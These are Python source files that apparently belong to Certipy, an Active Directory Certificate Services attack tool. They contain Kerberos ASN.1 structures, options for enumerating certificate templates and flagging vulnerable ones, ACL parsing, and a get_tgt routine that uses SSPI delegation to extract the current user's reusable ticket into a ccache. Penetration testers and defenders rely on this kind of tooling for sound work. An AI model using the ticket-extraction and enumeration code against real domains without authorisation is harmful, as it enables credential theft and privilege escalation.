        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 2}),
    ]


class EncKrbPrivPart(core.Sequence):
    explicit = (APPLICATION, 28)
    _fields = [
        ("user-data", core.OctetString, {"tag_type": TAG, "tag": 0}),
        ("timestamp", KerberosTime, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("usec", krb5int32, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("s-address", HostAddress, {"tag_type": TAG, "tag": 4, "optional": True}),
        ("r-address", HostAddress, {"tag_type": TAG, "tag": 5, "optional": True}),
    ]


class KRB_CRED(core.Sequence):
    explicit = (APPLICATION, 22)
    _fields = [
        ("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
        ("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}),
        ("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]


# http://web.mit.edu/freebsd/head/crypto/heimdal/lib/asn1/krb5.asn1
class KrbCredInfo(core.Sequence):
    _fields = [
        ("key", EncryptionKey, {"tag_type": TAG, "tag": 0}),
        ("prealm", Realm, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("pname", PrincipalName, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("flags", TicketFlags, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("authtime", KerberosTime, {"tag_type": TAG, "tag": 4, "optional": True}),
        ("starttime", KerberosTime, {"tag_type": TAG, "tag": 5, "optional": True}),
        ("endtime", KerberosTime, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("renew-till", KerberosTime, {"tag_type": TAG, "tag": 7, "optional": True}),
        ("srealm", Realm, {"tag_type": TAG, "tag": 8, "optional": True}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 9, "optional": True}),
        ("caddr", HostAddresses, {"tag_type": TAG, "tag": 10, "optional": True}),
    ]


class SequenceOfKrbCredInfo(core.SequenceOf):
    _child_spec = KrbCredInfo


class EncKrbCredPart(core.Sequence):
    explicit = (APPLICATION, 29)
    _fields = [
        ("ticket-info", SequenceOfKrbCredInfo, {"tag_type": TAG, "tag": 0}),
        ("nonce", krb5int32, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("timestamp", KerberosTime, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("usec", krb5int32, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("s-address", HostAddress, {"tag_type": TAG, "tag": 4, "optional": True}),
        ("r-address", HostAddress, {"tag_type": TAG, "tag": 5, "optional": True}),
    ]


class KRB_ERROR(core.Sequence):
    explicit = (APPLICATION, 30)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("ctime", KerberosTime, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("cusec", krb5int32, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("stime", KerberosTime, {"tag_type": TAG, "tag": 4}),
        ("susec", krb5int32, {"tag_type": TAG, "tag": 5}),
        ("error-code", krb5int32, {"tag_type": TAG, "tag": 6}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 7, "optional": True}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 8, "optional": True}),
        ("realm", Realm, {"tag_type": TAG, "tag": 9}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 10}),
        ("e-text", core.GeneralString, {"tag_type": TAG, "tag": 11, "optional": True}),
        ("e-data", core.OctetString, {"tag_type": TAG, "tag": 12, "optional": True}),
    ]


class ChangePasswdDataMS(core.Sequence):
    _fields = [
        ("newpasswd", core.OctetString, {"tag_type": TAG, "tag": 0}),
        ("targname", PrincipalName, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("targrealm", Realm, {"tag_type": TAG, "tag": 2, "optional": True}),
    ]


class EtypeList(core.SequenceOf):
    # -- the client's proposed enctype list in
    # -- decreasing preference order, favorite choice first
    _child_spec = ENCTYPE


class KerberosResponse(core.Choice):
    _alternatives = [
        ("AS_REP", AS_REP, {"implicit": (APPLICATION, 11)}),
        ("TGS_REP", TGS_REP, {"implicit": (APPLICATION, 13)}),
        ("KRB_ERROR", KRB_ERROR, {"implicit": (APPLICATION, 30)}),
    ]


class KRBCRED(core.Sequence):
    explicit = (APPLICATION, 22)

    _fields = [
        ("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
        ("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}),
        ("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/aceb70de-40f0-4409-87fa-df00ca145f5a
# other name: PA-S4U2Self
class PA_FOR_USER_ENC(core.Sequence):
    _fields = [
        ("userName", PrincipalName, {"tag_type": TAG, "tag": 0}),
        ("userRealm", Realm, {"tag_type": TAG, "tag": 1}),
        ("cksum", Checksum, {"tag_type": TAG, "tag": 2}),
        ("auth-package", KerberosString, {"tag_type": TAG, "tag": 3}),
    ]


class S4UUserIDOptions(core.BitString):
    _map = {
        0x40000000: "check-logon-hour",  # This option causes the KDC to check logon hour restrictions for the user.
        0x20000000: "signed-with-kun-27",  # In a request, asks the KDC to sign the reply with key usage number 27. In a reply, indicates that it was signed with key usage number 27.
    }


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/cd9d5ca7-ce20-4693-872b-2f5dd41cbff6
class S4UUserID(core.Sequence):
    _fields = [
        (
            "nonce",
            core.Integer,
            {"tag_type": TAG, "tag": 0},
        ),  # -- the nonce in KDC-REQ-BODY
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 1, "optional": True}),
        # -- Certificate mapping hints
        ("crealm", Realm, {"tag_type": TAG, "tag": 2}),
        (
            "subject-certificate",
            core.OctetString,
            {"tag_type": TAG, "tag": 3, "optional": True},
        ),
        ("options", S4UUserIDOptions, {"tag_type": TAG, "tag": 4, "optional": True}),
    ]


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/cd9d5ca7-ce20-4693-872b-2f5dd41cbff6
class PA_S4U_X509_USER(core.Sequence):
    _fields = [
        ("user-id", S4UUserID, {"tag_type": TAG, "tag": 0}),
        ("checksum", Checksum, {"tag_type": TAG, "tag": 1}),
    ]


class AD_IF_RELEVANT(AuthorizationData):
    pass


class GSSAPIOID(core.ObjectIdentifier):
    _map = {
        "1.2.840.113554.1.2.2": "krb5",
    }

    _reverse_map = {
        "krb5": "1.2.840.113554.1.2.2",
    }


class GSSAPIToken(core.Asn1Value):
    class_ = 1
    tag = 0
    method = 1


class MechType(core.ObjectIdentifier):
    _map = {
        #'': 'SNMPv2-SMI::enterprises.311.2.2.30',
        "1.3.6.1.4.1.311.2.2.10": "NTLMSSP - Microsoft NTLM Security Support Provider",
        "1.2.840.48018.1.2.2": "MS KRB5 - Microsoft Kerberos 5",
        "1.2.840.113554.1.2.2": "KRB5 - Kerberos 5",
        "1.2.840.113554.1.2.2.3": "KRB5 - Kerberos 5 - User to User",
        "1.3.6.1.4.1.311.2.2.30": "NEGOEX - SPNEGO Extended Negotiation Security Mechanism",
    }


class InitialContextToken(core.Sequence):
    class_ = 1
    tag = 0
    _fields = [
        ("thisMech", MechType, {"optional": False}),
        ("unk_bool", core.Boolean, {"optional": False}),
        ("innerContextToken", core.Any, {"optional": False}),
    ]

    _oid_pair = ("thisMech", "innerContextToken")
    _oid_specs = {
        "KRB5 - Kerberos 5": AP_REQ,
    }


# https://tools.ietf.org/html/rfc4121#section-4.1.1.1
class ChecksumFlags(enum.IntFlag):
    GSS_C_DELEG_FLAG = 1
    GSS_C_MUTUAL_FLAG = 2
    GSS_C_REPLAY_FLAG = 4
    GSS_C_SEQUENCE_FLAG = 8
    GSS_C_CONF_FLAG = 16
    GSS_C_INTEG_FLAG = 32
    GSS_C_DCE_STYLE = 0x1000


# https://tools.ietf.org/html/rfc4121#section-4.1.1
class AuthenticatorChecksum:
    def __init__(self):
        self.length_of_binding = None
        self.channel_binding = None  # MD5 hash of gss_channel_bindings_struct
        self.flags = None  # ChecksumFlags
        self.delegation = None
        self.delegation_length = None
        self.delegation_data = None
        self.extensions = None

    @staticmethod
    def from_bytes(data):
        return AuthenticatorChecksum.from_buffer(io.BytesIO(data))

    @staticmethod
    def from_buffer(buffer):
        ac = AuthenticatorChecksum()
        ac.length_of_binding = int.from_bytes(
            buffer.read(4), byteorder="little", signed=False
        )
        ac.channel_binding = buffer.read(
            ac.length_of_binding
        )  # according to the latest RFC this is 16 bytes long always
        ac.flags = ChecksumFlags(
            int.from_bytes(buffer.read(4), byteorder="little", signed=False)
        )
        if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            ac.delegation = bool(
                int.from_bytes(buffer.read(2), byteorder="little", signed=False)
            )
            ac.delegation_length = int.from_bytes(
                buffer.read(2), byteorder="little", signed=False
            )
            ac.delegation_data = buffer.read(ac.delegation_length)
        ac.extensions = buffer.read()
        return ac

    def to_bytes(self):
        t = len(self.channel_binding).to_bytes(4, byteorder="little", signed=False)
        t += self.channel_binding
        t += self.flags.to_bytes(4, byteorder="little", signed=False)
        if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            t += int(self.delegation).to_bytes(2, byteorder="little", signed=False)
            t += len(self.delegation_data.to_bytes()).to_bytes(
                2, byteorder="little", signed=False
            )
            t += self.delegation_data.to_bytes()
        if self.extensions:
            t += self.extensions.to_bytes()
        return t



NAME = "find"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import find

    find.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Enumerate AD CS")
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("output options")
    group.add_argument(
        "-bloodhound",
        action="store_true",
        help="Output result as BloodHound data for the custom-built BloodHound version from @ly4k with PKI support",
    )
    group.add_argument(
        "-old-bloodhound",
        action="store_true",
        help="Output result as BloodHound data for the original BloodHound version from @BloodHoundAD without PKI support",
    )
    group.add_argument(
        "-text",
        action="store_true",
        help="Output result as text",
    )
    group.add_argument(
        "-stdout",
        action="store_true",
        help="Output result as text to stdout",
    )
    group.add_argument(
        "-json",
        action="store_true",
        help="Output result as JSON",
    )
    group.add_argument(
        "-output",
        action="store",
        metavar="prefix",
        help="Filename prefix for writing results to",
    )

    group = subparser.add_argument_group("find options")
    group.add_argument(
        "-enabled",
        action="store_true",
        help="Show only enabled certificate templates. Does not affect BloodHound output",
    )
    group.add_argument(
        "-dc-only",
        action="store_true",
        help="Collects data only from the domain controller. Will not try to retrieve CA security/configuration or check for Web Enrollment",
    )
    group.add_argument(
        "-vulnerable",
        action="store_true",
        help="Show only vulnerable certificate templates based on nested group memberships. Does not affect BloodHound output",
    )
    group.add_argument(
        "-hide-admins",
        action="store_true",
        help="Don't show administrator permissions for -text, -stdout, and -json. Does not affect BloodHound output",
    )

    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )

    target.add_argument_group(subparser, connection_options=group)

    return NAME, entry



from impacket.krb5.ccache import CCache

from .encryption import Key, _enctype_table
from .netsecapi import (
    ISC_REQ,
    SEC_E,
    SECPKG_ATTR,
    SECPKG_CRED,
    AcquireCredentialsHandle,
    InitializeSecurityContext,
    LsaCallAuthenticationPackage,
    LsaConnectUntrusted,
    LsaFreeReturnBuffer,
    LsaLookupAuthenticationPackage,
    QueryContextAttributes,
    SecPkgContext_SessionKey,
    extract_ticket,
    get_lsa_error,
    submit_tkt_helper,
)
from certipy.lib.structs import (
    AP_REQ,
    KRB_CRED,
    Authenticator,
    AuthenticatorChecksum,
    ChecksumFlags,
    EncryptedData,
    InitialContextToken,
)


def submit_ticket(ticket_data: bytes):
    lsa_handle = LsaConnectUntrusted()
    kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")

    message = submit_tkt_helper(ticket_data, logonid=0)

    ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(
        lsa_handle, kerberos_package_id, message
    )
    if ret_status != 0:
        raise get_lsa_error(ret_status)

    if len(ret_msg) > 0:
        LsaFreeReturnBuffer(free_ptr)

    return True


def get_tgt(target: str) -> CCache:
    ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
    res, ctx, data, outputflags, expiry = InitializeSecurityContext(
        ctx,
        target,
        token=None,
        ctx=ctx,
        flags=ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY,
    )

    if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
        lsa_handle = LsaConnectUntrusted()

        kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")

        raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)

        key = Key(raw_ticket["Key"]["KeyType"], raw_ticket["Key"]["Key"])
        token = InitialContextToken.load(data[0][1])

        ticket = AP_REQ(token.native["innerContextToken"]).native

        cipher = _enctype_table[ticket["authenticator"]["etype"]]
        dec_authenticator = cipher.decrypt(key, 11, ticket["authenticator"]["cipher"])
        authenticator = Authenticator.load(dec_authenticator).native
        if authenticator["cksum"]["cksumtype"] != 0x8003:
            raise Exception("Bad checksum")

        checksum_data = AuthenticatorChecksum.from_bytes(
            authenticator["cksum"]["checksum"]
        )
        if ChecksumFlags.GSS_C_DELEG_FLAG not in checksum_data.flags:
            raise Exception("Delegation flag not set")

        cred_orig = KRB_CRED.load(checksum_data.delegation_data).native
        dec_authenticator = cipher.decrypt(key, 14, cred_orig["enc-part"]["cipher"])

        # reconstructing kirbi with the unencrypted data
        te = {}
        te["etype"] = 0
        te["cipher"] = dec_authenticator
        ten = EncryptedData(te)

        t = {}
        t["pvno"] = cred_orig["pvno"]
        t["msg-type"] = cred_orig["msg-type"]
        t["tickets"] = cred_orig["tickets"]
        t["enc-part"] = ten

        krb_cred = KRB_CRED(t)

        ccache = CCache()
        ccache.fromKRBCRED(krb_cred.dump())

        return ccache


def get_tgs(target: str) -> CCache:
    ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
    res, ctx, data, _, _ = InitializeSecurityContext(
        ctx,
        target,
        token=None,
        ctx=ctx,
        flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION,
    )
    if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
        sec_struct = SecPkgContext_SessionKey()
        QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct)
        sec_struct.Buffer

        InitialContextToken.load(data[0][1]).native["innerContextToken"]

        lsa_handle = LsaConnectUntrusted()

        kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")

        raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)

        krb_cred = KRB_CRED.load(raw_ticket["Ticket"])

        ccache = CCache()
        ccache.fromKRBCRED(krb_cred.dump())

        return ccache


"""

kerb = KerberosLive()
# ap_req, etype, key_value = kerb.get_apreq("ldap/dc.corp.local")
# ap_req, krb_cred, etype, key_value = kerb.get_apreq("ldap/dc.corp.local")
krb_cred = kerb.get_apreq("ldap/dc.corp.local")

ccache = CCache()
ccache.fromKRBCRED(krb_cred)
ccache.saveFile("check.ccache")

krb_cred = get_tgt("ldap/dc.corp.local")
ccache = CCache()
ccache.fromKRBCRED(krb_cred)
ccache.saveFile("check.ccache")

print(ccache.prettyPrint())

exit()
"""

# print(get_logon_info())



import re

from impacket.ldap import ldaptypes
from impacket.uuid import bin_to_string
from ldap3.protocol.formatters.formatters import format_sid

INHERITED_ACE = 0x10

from certipy.lib.constants import (
    ACTIVE_DIRECTORY_RIGHTS,
    CERTIFICATE_RIGHTS,
    CERTIFICATION_AUTHORITY_RIGHTS,
)


class ActiveDirectorySecurity:
    RIGHTS_TYPE = ACTIVE_DIRECTORY_RIGHTS

    def __init__(
        self,
        security_descriptor: bytes,
    ):
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
        sd.fromString(security_descriptor)
        self.sd = sd

        self.owner = format_sid(sd["OwnerSid"].getData())
        self.aces = {}

        aces = sd["Dacl"]["Data"]
        for ace in aces:
            sid = format_sid(ace["Ace"]["Sid"].getData())

            if sid not in self.aces:
                self.aces[sid] = {
                    "rights": self.RIGHTS_TYPE(0),
                    "extended_rights": [],
                    "inherited": ace["AceFlags"] & INHERITED_ACE == INHERITED_ACE,
                }

            if ace["AceType"] == ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
                self.aces[sid]["rights"] |= self.RIGHTS_TYPE(ace["Ace"]["Mask"]["Mask"])

            if ace["AceType"] == ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE:
                if ace["Ace"]["Flags"] == 2:
                    uuid = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
                elif ace["Ace"]["Flags"] == 1:
                    uuid = bin_to_string(ace["Ace"]["ObjectType"]).lower()
                else:
                    continue

                self.aces[sid]["extended_rights"].append(uuid)


class CASecurity(ActiveDirectorySecurity):
    RIGHTS_TYPE = CERTIFICATION_AUTHORITY_RIGHTS


class CertifcateSecurity(ActiveDirectorySecurity):
    RIGHTS_TYPE = CERTIFICATE_RIGHTS


def is_admin_sid(sid: str):
    return (
        re.match("^S-1-5-21-.+-(498|500|502|512|516|518|519|521)$", sid) is not None
        or sid == "S-1-5-9"
        or sid == "S-1-5-32-544"
    )



from impacket import hresult_errors
from impacket.krb5.kerberosv5 import constants as krb5_constants

"""
// RFC 4556
77: "KDC_ERR_INCONSISTENT_KEY_PURPOSE"
78: "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED"
79: "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED"
80: "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED"
81: "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED"
 // RFC 6113
90: "KDC_ERR_PREAUTH_EXPIRED"
91: "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED"
92: "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET"
93: "KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS"
"""

KRB5_ERROR_MESSAGES = krb5_constants.ERROR_MESSAGES
if 77 not in KRB5_ERROR_MESSAGES:
    KRB5_ERROR_MESSAGES.update(
        {
            77: (
                "KDC_ERR_INCONSISTENT_KEY_PURPOSE",
                "Certificate cannot be used for PKINIT client authentication",
            ),
            78: (
                "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED",
                "Digest algorithm for the public key in the certificate is not acceptable by the KDC",
            ),
            79: (
                "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED",
                "The paChecksum filed in the request is not present",
            ),
            80: (
                "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED",
                "The digest algorithm used by the id-pkinit-authData is not acceptable by the KDC",
            ),
            81: (
                "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED",
                "The KDC does not support the public key encryption key delivery method",
            ),
            90: (
                "KDC_ERR_PREAUTH_EXPIRED",
                "The conversation is too old and needs to restart",
            ),
            91: (
                "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED",
                "Additional pre-authentication required",
            ),
            92: (
                "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET",
                "KDC cannot accommodate requested padata element",
            ),
            93: ("KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS", "Unknown critical option"),
        }
    )


def translate_error_code(error_code: int) -> str:
    error_code &= 0xFFFFFFFF
    if error_code in hresult_errors.ERROR_MESSAGES:
        error_msg_short = hresult_errors.ERROR_MESSAGES[error_code][0]
        error_msg_verbose = hresult_errors.ERROR_MESSAGES[error_code][1]
        return "code: 0x%x - %s - %s" % (
            error_code,
            error_msg_short,
            error_msg_verbose,
        )
    else:
        return "unknown error code: 0x%x" % error_code
